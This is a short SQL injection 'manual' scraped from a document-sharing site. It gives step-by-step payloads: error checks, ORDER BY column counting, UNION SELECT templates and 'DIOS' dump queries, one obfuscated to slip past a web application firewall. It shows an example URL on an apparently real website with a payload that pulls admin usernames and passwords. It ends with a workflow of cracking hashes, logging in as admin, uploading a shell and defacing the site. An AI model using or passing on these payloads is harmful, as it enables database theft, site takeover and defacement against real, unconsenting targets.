Sqli Manual

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 2

Vuln checker : %27 or ' at the end of url, if(syntax sql error>>vuln)

Keep going until error :+order+by+10--+-

Check for vuln tables :


-(php digit)+union+select+1,2,3,4,5,6,7,8,9,10--+-

Add exploit on the vuln number


=-(php digit)+union+select+1,EXPLOIT,3,4,5--+-

Exploit :

MadBlood DIOS :

(Select+export_set(5,@:=0,
(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@
,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

ZEN with WAF DIOS:

(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/
(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/
())and(@)in(@:=CoNCat
%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)

other exploit :

make_set(6,@:=0x0a,
(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_n
ame,column_name)),@)

Look up :

Add :

-(php digit)+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,
(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

Example :

www.situs.co.il/advertiser_view.php?id=-
77+union+select+1,2,3,4,5,6,7,8,make_set(6,@:=0x0a,
(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,USER_NAME,PASSWORD)),@)--

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Hash password>>search for admin panel>>login>>upload shell>>and then what ever you
want...

Changing for index???, don't forget to backup, except israel website

Compile by MRHZ
===========================
tbl_admin_login_t :admin_name
tbl_admin_login_t :user_name
tbl_admin_login_t :user_password

make_set(6,@:=0x0a,
(select(1)from(tbl_admin_login_t)where@:=make_set(511,@,0x3c6c693e,admin_name,user_
name,user_password)),@)

You might also like